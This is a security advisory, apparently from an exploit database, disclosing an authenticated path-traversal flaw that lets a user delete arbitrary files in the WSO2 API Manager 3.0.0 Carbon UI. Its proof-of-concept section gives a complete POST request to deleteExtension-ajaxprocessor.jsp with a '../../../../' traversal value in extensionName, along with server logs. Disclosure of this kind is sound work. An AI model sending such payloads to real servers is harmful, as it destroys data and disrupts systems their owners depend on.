WSO2 API Manager Carbon Interface 3.0.0 File Delete

2020.04.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Document Title: =============== WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) ##CVE not assigned yet ##Author : Raki Ben Hamouda ##Security Update : https://apim.docs.wso2.com/en/latest/ Common Vulnerability Scoring System: ==================================== 8.5 Affected Product(s): ==================== WSO2 API Manager Carbon Interface Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests and to delete arbitrary System files. The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. =============================== Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) [2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d eployment\server\registryextensions\commons-dir at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j ava:531) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.client.OperationClient.execute(OperationClient.java: 149) ~[axis2_1.6.1.wso2v38.jar:?] at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte nsions.stub_4.7.13.jar:?] at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens ions.ui_4.7.13.jar:?] at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t omcat_9.0.22.wso2v1.jar:?] *Error displayed in Web browser with body request: <script type="text/javascript"> CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar"); </script> ============================= Request Method(s): [+] POST Vulnerable Module(s): [+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp Vulnerable Parameter(s): [+] extensionName Server version 3.0.0 Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) 2-attacker uploads any file .jar extension 3-attacker intercepts the request that follows and modifies the parameter with traversal string: --- PoC Session Logs [POST] --- POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 Host: localhost:9443 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS Content-Length: 22 Origin: https://localhost:9443 Connection: close Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions Pragma: no-cache Cache-Control: no-cache extensionName=../../../../INSTALL.txt ---------------Returned Headers in Response------------------ HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Content-Type: text/html;charset=UTF-8 Content-Length: 10 Date: Sat, 04 Jan 2020 00:55:38 GMT Connection: close Server: WSO2 Carbon Server


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top